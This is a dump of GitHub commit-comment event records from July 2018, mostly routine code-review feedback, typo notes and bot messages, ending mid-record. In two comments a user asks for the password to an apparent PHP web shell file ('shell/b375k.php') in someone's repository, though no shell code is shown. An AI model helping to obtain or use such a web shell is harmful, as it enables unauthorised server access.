{"id":"8010483794","type":"CommitCommentEvent","actor":{"login":"quelhasu"},"repo":{"name":"ThomasPericoi/PausePipi"},"payload":{"comment":{"id":29815026,"position":551,"line":319,"path":"js/main.js","commit_id":"2deab2d01804a8639320aeca464fbd0379a78c9e","created_at":"2018-07-24T14:16:39Z","updated_at":"2018-07-24T14:16:39Z","author_association":"COLLABORATOR","body":"https://prettier.io/ mainger"}},"created_at":"2018-07-24T14:16:39Z"}
{"id":"8010489629","type":"CommitCommentEvent","actor":{"login":"glensc"},"repo":{"name":"WeblateOrg/weblate"},"payload":{"comment":{"id":29815036,"position":7,"line":127,"path":"docs/admin/deployments.rst","commit_id":"5d0c02870053e865b81761b6767d62cac08a16bf","created_at":"2018-07-24T14:17:29Z","updated_at":"2018-07-24T14:17:29Z","author_association":"CONTRIBUTOR","body":"`lastest` typo"}},"created_at":"2018-07-24T14:17:29Z"}
{"id":"8010492866","type":"CommitCommentEvent","actor":{"login":"mcallaghan-sandvine"},"repo":{"name":"google/styleguide"},"payload":{"comment":{"id":29815046,"position":null,"line":null,"path":null,"commit_id":"1707ccb7d18e4980870ce0ea6ab3d380f9a36a30","created_at":"2018-07-24T14:17:58Z","updated_at":"2018-07-24T14:17:58Z","author_association":"NONE","body":"\r\n1. ugh, FIVE YEARS it's been stale?\r\n2. has anyone done a diff/assessment to compare the two (many people were linking directly to the HTML and coding to it ... if this pyguide.md has diverged for some time ... it would be nice to have a summary of what's changed)\r\n2. can / should we just delete all the CONTENT and leave the stub page for landing + link to .md?"}},"created_at":"2018-07-24T14:17:58Z"}
{"id":"8010496237","type":"CommitCommentEvent","actor":{"login":"eternal-flame-AD"},"repo":{"name":"pea3nut/pxer-homepage"},"payload":{"comment":{"id":29815066,"position":5,"line":11,"path":"routes/md.js","commit_id":"df5586207511cd6d34f471b851ef1f9e1fc83e6e","created_at":"2018-07-24T14:18:27Z","updated_at":"2018-07-24T14:18:27Z","author_association":"CONTRIBUTOR","body":"underscore is already included in metacharacter '\\w'"}},"created_at":"2018-07-24T14:18:27Z"}
{"id":"8010499161","type":"CommitCommentEvent","actor":{"login":"eternal-flame-AD"},"repo":{"name":"pea3nut/pxer-homepage"},"payload":{"comment":{"id":29815075,"position":5,"line":11,"path":"routes/md.js","commit_id":"df5586207511cd6d34f471b851ef1f9e1fc83e6e","created_at":"2018-07-24T14:18:52Z","updated_at":"2018-07-24T14:18:52Z","author_association":"CONTRIBUTOR","body":"so  '/:mdFile(\\w+)' should be ok"}},"created_at":"2018-07-24T14:18:52Z"}
{"id":"8010500885","type":"CommitCommentEvent","actor":{"login":"peterdemin"},"repo":{"name":"applegrew/django-select2"},"payload":{"comment":{"id":29815078,"position":24,"line":77,"path":"django_select2/conf.py","commit_id":"1954bf57fafee0f27a7b444b1a468331ac2af9b3","created_at":"2018-07-24T14:19:10Z","updated_at":"2018-07-24T14:19:10Z","author_association":"NONE","body":"f strings were added in Python 3.6. could you please revert this change, so I could continue using Python 3.4?"}},"created_at":"2018-07-24T14:19:10Z"}
{"id":"8010506583","type":"CommitCommentEvent","actor":{"login":"alexey-lysiuk"},"repo":{"name":"OrdinaryMagician/gzdoom"},"payload":{"comment":{"id":29815086,"position":null,"line":null,"path":null,"commit_id":"f287e99f968c740819b6d61000865589fbbe387c","created_at":"2018-07-24T14:19:58Z","updated_at":"2018-07-24T14:19:58Z","author_association":"NONE","body":"Cannot say anything without code. Post a callstack at least."}},"created_at":"2018-07-24T14:19:58Z"}
{"id":"8010508343","type":"CommitCommentEvent","actor":{"login":"SumavisionQ5"},"repo":{"name":"shantigilbert/CoreELEC"},"payload":{"comment":{"id":29815091,"position":null,"line":null,"path":null,"commit_id":"d9e6c7c0a103e6aa11dba0d5bfb4adfa185f140a","created_at":"2018-07-24T14:20:15Z","updated_at":"2018-07-24T14:20:15Z","author_association":"NONE","body":"Better keep the following buttons' mapping since later we could map the ES's input configuration to Reicast and AdvanceMAME using an SH, just as RetroPie do.\r\n --     \"LeftTrigger\",\r\n --\t\"RightTrigger\",\r\n --\t\"LeftThumb\",\r\n --\t\"RightThumb\",\r\n --\t\"LeftAnalogUp\",\r\n --\t\"LeftAnalogDown\",\r\n --\t\"LeftAnalogLeft\",\r\n --\t\"LeftAnalogRight\",\r\n --\t\"RightAnalogUp\",\r\n --\t\"RightAnalogDown\",\r\n --\t\"RightAnalogLeft\",\r\n --\t\"RightAnalogRight\",\r\n --\t\"HotKeyEnable\""}},"created_at":"2018-07-24T14:20:15Z"}
{"id":"8010509847","type":"CommitCommentEvent","actor":{"login":"piscisaureus"},"repo":{"name":"ry/deno"},"payload":{"comment":{"id":29815093,"position":7,"line":61,"path":"tools/util.py","commit_id":"91fde840a203b5059d82bccb294a45d2e8e29f77","created_at":"2018-07-24T14:20:27Z","updated_at":"2018-07-24T14:20:27Z","author_association":"COLLABORATOR","body":"Spelling (same for the commit message)"}},"created_at":"2018-07-24T14:20:27Z"}
{"id":"8010510356","type":"CommitCommentEvent","actor":{"login":"davideblakeman"},"repo":{"name":"davideblakeman/blakemannawoor"},"payload":{"comment":{"id":29815096,"position":null,"line":null,"path":null,"commit_id":"1b137846702832f1f6f35d9475fe00f623562cae","created_at":"2018-07-24T14:20:32Z","updated_at":"2018-07-24T14:20:32Z","author_association":"OWNER","body":"added version number"}},"created_at":"2018-07-24T14:20:32Z"}
{"id":"8010515076","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29815105,"position":10,"line":8,"path":"ruby_basics_part_1/ideal_weight.rb","commit_id":"5d9de2f6743b74cec41bbfed3fe962934cd1c6a3","created_at":"2018-07-24T14:21:15Z","updated_at":"2018-07-24T14:21:15Z","author_association":"NONE","body":"здесь \"флоат\", а в 12 строке еще и \"интеджер\" )))\r\nнадо выбрать что-то одно ;)\r\nда еще и 2 \"чомпа\"... перебор"}},"created_at":"2018-07-24T14:21:15Z"}
{"id":"8010515382","type":"CommitCommentEvent","actor":{"login":"sonong"},"repo":{"name":"cnodejs/egg-cnode"},"payload":{"comment":{"id":29815106,"position":null,"line":null,"path":null,"commit_id":"e634a68298de27b00209d60e436464a9faf62168","created_at":"2018-07-24T14:21:18Z","updated_at":"2018-07-24T14:21:18Z","author_association":"NONE","body":"亲测可行。"}},"created_at":"2018-07-24T14:21:18Z"}
{"id":"8010520010","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/iris-feedstock"},"payload":{"comment":{"id":29815113,"position":null,"line":null,"path":null,"commit_id":"9d21a590c9eaf4b2058c37e12d16238fbed1c525","created_at":"2018-07-24T14:22:00Z","updated_at":"2018-07-24T14:22:00Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @lbdreyer was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-24T14:22:00Z"}
{"id":"8010571862","type":"CommitCommentEvent","actor":{"login":"carlasp"},"repo":{"name":"awsdocs/iam-user-guide"},"payload":{"comment":{"id":29815213,"position":null,"line":null,"path":null,"commit_id":"64aa95d08c0ce98ca64c99e210ecddcd6bb9b0d4","created_at":"2018-07-24T14:29:41Z","updated_at":"2018-07-24T14:29:41Z","author_association":"CONTRIBUTOR","body":"Hmmm. Thanks for checking, but what's up there is current. As I mentioned earlier, the links were problematic and I could not directly include them. Instead, I rewrote the text and provided the link to the knowledgebase home, and instructed customers to search for SAML AWS there. \r\n\r\nI accepted your pull request so you would get credit for it, and then made my changes. I apologize for any confusion, and thank you for your careful attention. "}},"created_at":"2018-07-24T14:29:41Z"}
{"id":"8010573529","type":"CommitCommentEvent","actor":{"login":"rajput-haxor"},"repo":{"name":"RomaniukVadim/romaniukvadim.github.io"},"payload":{"comment":{"id":29815218,"position":null,"line":null,"path":null,"commit_id":"d2128292c4f8cb42890d6fc36431ae98dff40063","created_at":"2018-07-24T14:29:56Z","updated_at":"2018-07-24T14:29:56Z","author_association":"NONE","body":"dear please password. :( "}},"created_at":"2018-07-24T14:29:56Z"}
{"id":"8010574965","type":"CommitCommentEvent","actor":{"login":"rajput-haxor"},"repo":{"name":"RomaniukVadim/romaniukvadim.github.io"},"payload":{"comment":{"id":29815221,"position":4,"line":9,"path":"shell/b375k.php","commit_id":"d2128292c4f8cb42890d6fc36431ae98dff40063","created_at":"2018-07-24T14:30:09Z","updated_at":"2018-07-24T14:30:09Z","author_association":"NONE","body":"password of this shelL?"}},"created_at":"2018-07-24T14:30:09Z"}
{"id":"8010575432","type":"CommitCommentEvent","actor":{"login":"stank2010"},"repo":{"name":"stank2010/php_function"},"payload":{"comment":{"id":29815223,"position":16,"line":15,"path":"README.md","commit_id":"d079a7d6cde05295d4e7433630c23864f621ea9b","created_at":"2018-07-24T14:30:13Z","updated_at":"2018-07-24T14:30:13Z","author_association":"OWNER","body":"> \r\nas\r\n> "}},"created_at":"2018-07-24T14:30:13Z"}
{"id":"8010577062","type":"CommitCommentEvent","actor":{"login":"jdalrymple"},"repo":{"name":"jdalrymple/node-gitlab"},"payload":{"comment":{"id":29815226,"position":null,"line":null,"path":null,"commit_id":"f4f1aeefd1d3bb2d400dbc12cc570278c45ba63e","created_at":"2018-07-24T14:30:26Z","updated_at":"2018-07-24T14:30:26Z","author_association":"OWNER","body":"So even looking at the status', it still isnt completely up:\r\n\r\nHere is the first response to return back 200. Notice how all the status' are OK\r\n{\"db_check\":{\"status\":\"ok\"},\"redis_check\":{\"status\":\"ok\"},\"cache_check\":{\"status\":\"ok\"},\"queues_check\":{\"status\":\"ok\"},\"shared_state_check\":{\"status\":\"ok\"},\"fs_shards_check\":{\"status\":\"ok\",\"labels\":{\"shard\":\"default\"}},\"gitaly_check\":{\"status\":\"ok\",\"labels\":{\"shard\":\"default\"}}\r\n\r\nBut then testing that everything is complete\r\n- docker exec -it gitlab bash -lc 'printf \"%q\" \"${PERSONAL_ACCESS_TOKEN}\"'\r\n\r\nReturns ''\r\n\r\nHmm maybe its because of my docker-entrypoint file. \r\n\r\nIn that file it runs the gitlab init, waits for 30 seconds and then exports the env vars. So when i test for readiness, its returning true after that init, but the exports havent happened yet. \r\n\r\nHmm, need to think of a way around that."}},"created_at":"2018-07-24T14:30:26Z"}
{"id":"8010578058","type":"CommitCommentEvent","actor":{"login":"stank2010"},"repo":{"name":"stank2010/php_function"},"payload":{"comment":{"id":29815230,"position":16,"line":15,"path":"README.md","commit_id":"d079a7d6cde05295d4e7433630c23864f621ea9b","created_at":"2018-07-24T14:30:35Z","updated_at":"2018-07-24T14:30:35Z","author_association":"OWNER","body":"`+<?php\r\n+  html();\r\n+    body('class=\"body\"');\r\n+      for($i=1;$i<=12;$i++)\r\n+        show($i.' ');\r\n+    body_end();\r\n+  html_end();\r\n+?>`"}},"created_at":"2018-07-24T14:30:35Z"}
{"id":"8010582103","type":"CommitCommentEvent","actor":{"login":"krytthew"},"repo":{"name":"suddenlyGiovanni/p2p-chat"},"payload":{"comment":{"id":29815237,"position":null,"line":null,"path":null,"commit_id":"a64d852d68888778f407edd741eb922be90749cb","created_at":"2018-07-24T14:31:10Z","updated_at":"2018-07-24T14:31:10Z","author_association":"NONE","body":"hi can you need me? please"}},"created_at":"2018-07-24T14:31:10Z"}
{"id":"8010583985","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29815238,"position":20,"line":20,"path":"ruby_basics_part_1/quadratic_equation.rb","commit_id":"882346ab0656d49d74c9db0ed5f07700bd08e549","created_at":"2018-07-24T14:31:26Z","updated_at":"2018-07-24T14:31:26Z","author_association":"NONE","body":"здесь коэффициэнт `c` не испльзуется в формуле, поэтому его передавать не нужно в метод"}},"created_at":"2018-07-24T14:31:26Z"}
{"id":"8010586248","type":"CommitCommentEvent","actor":{"login":"jsitnicki"},"repo":{"name":"LorenzoBianconi/ovn-scale-test"},"payload":{"comment":{"id":29815240,"position":16,"line":41,"path":"rally_ovs/plugins/ovs/ovnclients.py","commit_id":"84a7ef605d67283f17ccc4aad3ec8f0841e0a713","created_at":"2018-07-24T14:31:47Z","updated_at":"2018-07-24T14:31:47Z","author_association":"NONE","body":"Looks like we could use a helper method for the above two statements."}},"created_at":"2018-07-24T14:31:47Z"}
{"id":"8010588736","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29815244,"position":null,"line":null,"path":null,"commit_id":"a157a6d5103506b14079881cd36da133b803535a","created_at":"2018-07-24T14:32:10Z","updated_at":"2018-07-24T14:32:10Z","author_association":"OWNER","body":"Created multidev environment [msgu#ci-51](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#ci-51).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-51-msgu.pantheonsite.io/)"}},"created_at":"2018-07-24T14:32:10Z"}
{"id":"8010591354","type":"CommitCommentEvent","actor":{"login":"fche"},"repo":{"name":"flightaware/dump1090"},"payload":{"comment":{"id":29815248,"position":null,"line":null,"path":null,"commit_id":"1caabc5ad874c539721bd675d6304aa5e03397a2","created_at":"2018-07-24T14:32:33Z","updated_at":"2018-07-24T14:32:33Z","author_association":"NONE","body":"It'd be great if people could start self-registering aircraft / types again, like they could on on VRS, or they sort of can on flightradar24.com."}},"created_at":"2018-07-24T14:32:33Z"}
{"id":"8010591590","type":"CommitCommentEvent","actor":{"login":"andersonaddo"},"repo":{"name":"git/git"},"payload":{"comment":{"id":29815250,"position":1,"line":1,"path":"Makefile","commit_id":"e83c5163316f89bfbde7d9ab23ca2e25604af290","created_at":"2018-07-24T14:32:35Z","updated_at":"2018-07-24T14:32:35Z","author_association":"NONE","body":"Where it all started!"}},"created_at":"2018-07-24T14:32:35Z"}
{"id":"8010595833","type":"CommitCommentEvent","actor":{"login":"jsitnicki"},"repo":{"name":"LorenzoBianconi/ovn-scale-test"},"payload":{"comment":{"id":29815254,"position":6,"line":52,"path":"rally_ovs/plugins/ovs/ovsclients_impl.py","commit_id":"64254a24376b751a1f9943919412220be698e73b","created_at":"2018-07-24T14:33:13Z","updated_at":"2018-07-24T14:33:13Z","author_association":"NONE","body":"Wouldn't it be less surprising if the parameter name was the same, that is `raise_on_error`?"}},"created_at":"2018-07-24T14:33:13Z"}
{"id":"8010601657","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29815265,"position":41,"line":41,"path":"ruby_basics_part_1/quadratic_equation.rb","commit_id":"882346ab0656d49d74c9db0ed5f07700bd08e549","created_at":"2018-07-24T14:34:04Z","updated_at":"2018-07-24T14:34:04Z","author_association":"NONE","body":"с методами \"негатив рут\" и \"позитив рут\" получается интересная ситуация\r\nв обоих методах вычисляется дискриминант, который уже известен\r\nправильно будет его передать третьим аргументом, а коэффициэнт `c` не передавать, потому что он не используется в чистом виде в формулах"}},"created_at":"2018-07-24T14:34:04Z"}
{"id":"8010610263","type":"CommitCommentEvent","actor":{"login":"piscisaureus"},"repo":{"name":"ry/deno"},"payload":{"comment":{"id":29815282,"position":8,"line":62,"path":"tools/util.py","commit_id":"91fde840a203b5059d82bccb294a45d2e8e29f77","created_at":"2018-07-24T14:35:19Z","updated_at":"2018-07-24T14:35:19Z","author_association":"COLLABORATOR","body":"This is too tersely named. Just call it glob_tree or something."}},"created_at":"2018-07-24T14:35:19Z"}
{"id":"8010611081","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29815284,"position":41,"line":41,"path":"ruby_basics_part_1/quadratic_equation.rb","commit_id":"882346ab0656d49d74c9db0ed5f07700bd08e549","created_at":"2018-07-24T14:35:26Z","updated_at":"2018-07-24T14:35:26Z","author_association":"NONE","body":"а еще правильней передать не сам дискриминант, а корень из него, который будет вычислен после  39 строки\r\nчтобы не считать корень два раза\r\nсейчас же получается, что дискриминант вычисляется три раза, а корень - два\r\nтаких ситуаций лучше не допускать"}},"created_at":"2018-07-24T14:35:26Z"}
{"id":"8010613202","type":"CommitCommentEvent","actor":{"login":"RenderBroken"},"repo":{"name":"EAS-Project/AnyKernel2"},"payload":{"comment":{"id":29815289,"position":null,"line":null,"path":null,"commit_id":"6394ca4b3ca52ba92f381d23d342313871cc09e6","created_at":"2018-07-24T14:35:43Z","updated_at":"2018-07-24T14:35:43Z","author_association":"MEMBER","body":"It is hard to say when you have 8 cores, all the same capacity. What is the\ndefault configuration?\n\nOn Tue, Jul 24, 2018, 4:06 AM Shoaib Anwar <notifications@github.com> wrote:\n\n> @joshuous <https://github.com/joshuous> So, these values should be fine\n> for MSM8937 too? I have a device with this SoC. BTW, thanks for the quick\n> info!\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/EAS-Project/AnyKernel2/commit/6394ca4b3ca52ba92f381d23d342313871cc09e6#commitcomment-29811215>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEB_JglFtWkZoxt34GO_Mh_3ZVFvEkkaks5uJuOmgaJpZM4VcV6s>\n> .\n>\n"}},"created_at":"2018-07-24T14:35:43Z"}
{"id":"8010613408","type":"CommitCommentEvent","actor":{"login":"pbomba"},"repo":{"name":"pbomba/Dungeon_Time"},"payload":{"comment":{"id":29815290,"position":null,"line":null,"path":null,"commit_id":"8f91c5724e8eca9f10b4c54b65d6fbafb28063c7","created_at":"2018-07-24T14:35:45Z","updated_at":"2018-07-24T14:35:45Z","author_association":"OWNER","body":"Very dungeon"}},"created_at":"2018-07-24T14:35:45Z"}
{"id":"8010614070","type":"CommitCommentEvent","actor":{"login":"danielberndt"},"repo":{"name":"facebook/create-react-app"},"payload":{"comment":{"id":29815294,"position":null,"line":null,"path":null,"commit_id":"d0afe4b3b99b1b0b6ea5b72ccc50a6066c15aac0","created_at":"2018-07-24T14:35:51Z","updated_at":"2018-07-24T14:35:51Z","author_association":"CONTRIBUTOR","body":"Hm... I tried really hard to reproduce it with a new project and wasn't able to. So I guess it had something to do with my specific setup."}},"created_at":"2018-07-24T14:35:51Z"}
{"id":"8010616427","type":"CommitCommentEvent","actor":{"login":"pklada"},"repo":{"name":"jameslnewell/styled-components-spacing"},"payload":{"comment":{"id":29815302,"position":102,"line":48,"path":"src/Margin.jsx","commit_id":"158490f7f8ea97b589fa89c756ab421f06428afd","created_at":"2018-07-24T14:36:12Z","updated_at":"2018-07-24T14:36:12Z","author_association":"NONE","body":"was this reverted on purpose? looks like you can no longer pass in a custom component unless I'm mistaken (its still in the docs)"}},"created_at":"2018-07-24T14:36:12Z"}
{"id":"8010619476","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29815312,"position":20,"line":20,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"ca022b14035d63a153530240384c81091961c34e","created_at":"2018-07-24T14:36:39Z","updated_at":"2018-07-24T14:36:39Z","author_association":"NONE","body":"лучше просто `a`, `b`, `c`"}},"created_at":"2018-07-24T14:36:39Z"}
{"id":"8010622238","type":"CommitCommentEvent","actor":{"login":"ianpartridge"},"repo":{"name":"IBM-Swift/Kitura-WebSocket"},"payload":{"comment":{"id":29815319,"position":16,"line":73,"path":"Sources/KituraWebSocket/WebSocketConnection.swift","commit_id":"6dc4c7ad781e9b884a4ed1228fdbf39bf3895c2c","created_at":"2018-07-24T14:37:02Z","updated_at":"2018-07-24T14:37:02Z","author_association":"MEMBER","body":"No need for `self.` on function calls."}},"created_at":"2018-07-24T14:37:02Z"}
{"id":"8010622447","type":"CommitCommentEvent","actor":{"login":"andrerom"},"repo":{"name":"ezsystems/ezplatform"},"payload":{"comment":{"id":29815320,"position":16,"line":49,"path":"app/config/default_parameters.yml","commit_id":"81a0c6862c005a4f4e10f7b39ebf168962f8c948","created_at":"2018-07-24T14:37:04Z","updated_at":"2018-07-24T14:37:04Z","author_association":"MEMBER","body":"Intention was to transform some plain env var usage to `env()` in order to cleanup generic.php a bit, commit / PR title is not so clear on that.\r\n\r\nAnd yeah should have kept it in two commits."}},"created_at":"2018-07-24T14:37:04Z"}
{"id":"8010623096","type":"CommitCommentEvent","actor":{"login":"walada"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29815322,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T14:37:10Z","updated_at":"2018-07-24T14:37:10Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-24T14:37:10Z"}
{"id":"8010625455","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/easybuild-framework-feedstock"},"payload":{"comment":{"id":29815326,"position":null,"line":null,"path":null,"commit_id":"a621560279553c5072fc4defddb5c833240e2272","created_at":"2018-07-24T14:37:31Z","updated_at":"2018-07-24T14:37:31Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @boegel was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-24T14:37:31Z"}
{"id":"8010625824","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/easybuild-easyblocks-feedstock"},"payload":{"comment":{"id":29815327,"position":null,"line":null,"path":null,"commit_id":"6a37cdff9ff68d91156e0b8d666e84f269578200","created_at":"2018-07-24T14:37:34Z","updated_at":"2018-07-24T14:37:34Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @boegel was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-24T14:37:34Z"}
{"id":"8010631471","type":"CommitCommentEvent","actor":{"login":"jesusbagpuss"},"repo":{"name":"eprints/eprints"},"payload":{"comment":{"id":29815335,"position":null,"line":null,"path":null,"commit_id":"e3e08522ff365c9953fa8dd60496cc4a3fb5abf7","created_at":"2018-07-24T14:38:24Z","updated_at":"2018-07-24T14:38:24Z","author_association":"CONTRIBUTOR","body":"Excellent - I should have made it as a single commit - sorry!"}},"created_at":"2018-07-24T14:38:24Z"}
{"id":"8010635199","type":"CommitCommentEvent","actor":{"login":"dkouzoup"},"repo":{"name":"acados/acados"},"payload":{"comment":{"id":29815336,"position":17,"line":453,"path":"acados/dense_qp/dense_qp_common.c","commit_id":"1c9879eb3408613025cccdf889a0ea5d8dd42b7f","created_at":"2018-07-24T14:38:57Z","updated_at":"2018-07-24T14:38:57Z","author_association":"MEMBER","body":"What's that for?"}},"created_at":"2018-07-24T14:38:57Z"}
{"id":"8010635563","type":"CommitCommentEvent","actor":{"login":"TemboTMB"},"repo":{"name":"TemboTMB/TemboCoin-whitepaper"},"payload":{"comment":{"id":29815338,"position":null,"line":null,"path":null,"commit_id":"31810ffb532d97a28a11fc7c58f23fa1b2fd8cd4","created_at":"2018-07-24T14:39:00Z","updated_at":"2018-07-24T14:39:00Z","author_association":"OWNER","body":"great project, never miss to join the move "}},"created_at":"2018-07-24T14:39:00Z"}
{"id":"8010636364","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29815340,"position":24,"line":24,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"ca022b14035d63a153530240384c81091961c34e","created_at":"2018-07-24T14:39:08Z","updated_at":"2018-07-24T14:39:08Z","author_association":"NONE","body":"24 и 23 строки лучше поменять местами, тогда не нужно будет два раза искать гипотенузу\r\nсоответственно в текущей 23 строке вместо обращения к методу надо будет обращаться к переменной \"гипотенза\""}},"created_at":"2018-07-24T14:39:08Z"}
{"id":"8010641914","type":"CommitCommentEvent","actor":{"login":"SWilke"},"repo":{"name":"as-ideas/as-ideas-website"},"payload":{"comment":{"id":29815347,"position":8,"line":8,"path":"public/blog/2018/07/disaster-recovery-day.md","commit_id":"91b856bc3c7c653e482475656480022623252885","created_at":"2018-07-24T14:39:56Z","updated_at":"2018-07-24T14:39:56Z","author_association":"NONE","body":"Wissenslücken"}},"created_at":"2018-07-24T14:39:56Z"}
{"id":"8010642943","type":"CommitCommentEvent","actor":{"login":"SWilke"},"repo":{"name":"as-ideas/as-ideas-website"},"payload":{"comment":{"id":29815351,"position":2,"line":3,"path":"public/blog/2018/07/disaster-recovery-day.md","commit_id":"91b856bc3c7c653e482475656480022623252885","created_at":"2018-07-24T14:40:06Z","updated_at":"2018-07-24T14:40:06Z","author_association":"NONE","body":"Bitte kein nix sondern \"nichts\" ;)"}},"created_at":"2018-07-24T14:40:06Z"}
{"id":"8010643705","type":"CommitCommentEvent","actor":{"login":"ChuBrito"},"repo":{"name":"ChuBrito/JavaScript-basico"},"payload":{"comment":{"id":29815359,"position":null,"line":null,"path":null,"commit_id":"8fed9050806ec07117e7977859c416c123a7f266","created_at":"2018-07-24T14:40:13Z","updated_at":"2018-07-24T14:40:13Z","author_association":"OWNER","body":"Typer made with jquery"}},"created_at":"2018-07-24T14:40:13Z"}
{"id":"8010644806","type":"CommitCommentEvent","actor":{"login":"SWilke"},"repo":{"name":"as-ideas/as-ideas-website"},"payload":{"comment":{"id":29815361,"position":2,"line":3,"path":"public/blog/2018/07/disaster-recovery-day.md","commit_id":"91b856bc3c7c653e482475656480022623252885","created_at":"2018-07-24T14:40:22Z","updated_at":"2018-07-24T14:40:22Z","author_association":"NONE","body":"Bitte nicht \"nix\" "}},"created_at":"2018-07-24T14:40:22Z"}
{"id":"8010652150","type":"CommitCommentEvent","actor":{"login":"pantharshit00"},"repo":{"name":"javascript-af/javascript-af-ts"},"payload":{"comment":{"id":29815371,"position":null,"line":null,"path":null,"commit_id":"ac509143d4ff746d4cf62f6893e0bb90612fff37","created_at":"2018-07-24T14:41:26Z","updated_at":"2018-07-24T14:41:26Z","author_association":"MEMBER","body":"Great! I love it. 😄 "}},"created_at":"2018-07-24T14:41:26Z"}
{"id":"8010656590","type":"CommitCommentEvent","actor":{"login":"sanguinariojoe"},"repo":{"name":"spring1944/spring1944"},"payload":{"comment":{"id":29815382,"position":null,"line":null,"path":null,"commit_id":"ece36522fd0f0da480904947d43104d873d4fbaf","created_at":"2018-07-24T14:42:07Z","updated_at":"2018-07-24T14:42:07Z","author_association":"MEMBER","body":"OK, I checked that...\r\n\r\nThe game is always started with TA view, no matters the last camera set in previous games... Moreover, no config regarding the selected camera is stored.\r\n\r\nOn the other hand, the new GUI is successfully storing camera switching shortcuts.\r\n\r\nSo apparently no collision at all"}},"created_at":"2018-07-24T14:42:07Z"}
{"id":"8010659337","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29815384,"position":null,"line":null,"path":null,"commit_id":"a81919b573eec06e399403a9e0e390a0e330f4b8","created_at":"2018-07-24T14:42:29Z","updated_at":"2018-07-24T14:42:29Z","author_association":"MEMBER","body":"This resolves #669 "}},"created_at":"2018-07-24T14:42:29Z"}
{"id":"8010661063","type":"CommitCommentEvent","actor":{"login":"rootsco"},"repo":{"name":"makingsensetraining/DirectlyTraining"},"payload":{"comment":{"id":29815386,"position":3,"line":1,"path":"webapp/app/utils/user.js","commit_id":"b2fbe723d1baf1ce969bb09a20a0ac0c36cb0122","created_at":"2018-07-24T14:42:44Z","updated_at":"2018-07-24T14:42:44Z","author_association":"COLLABORATOR","body":"Consider the following more abarcative implementation instead\r\n\r\n`utils/user.js`\r\n\r\nuser.js\r\n```\r\nimport { get, isEmpty } from './helpers';\r\n\r\nexport function getUserId(user = {}) {\r\n  let userId = get(user, '_id');\r\n\r\n  if (!userId) {\r\n    userId = get(user, 'id');\r\n  }\r\n\r\n  return userId;\r\n}\r\n\r\nexport function isUserMatchById(sourceUser = {}, targetUser = {}) {\r\n  return getUserId(sourceUser) === getUserId(targetUser); \r\n}\r\n\r\nexport function isValidUser(user) {\r\n  return isEmpty(getUserId(user)) === false;\r\n}\r\n```\r\n\r\nuser.test.js\r\n```\r\nimport {\r\n  getUserId,\r\n  isUserMatchById,\r\n  isValidUser\r\n} from './user';\r\n\r\ndescribe('User Util', () => {\r\n  describe('getUserId', () => {\r\n    it('should be defined', () => {\r\n      expect(getUserId).toBeDefined();\r\n    });\r\n\r\n    it('should be a function', () => {\r\n      expect(getUserId).toEqual(expect.any(Function));\r\n    });\r\n\r\n    describe('User id property fallback', () => {\r\n      it('should return `_id` value, if `_id` exists', () => {\r\n        const user = { _id: 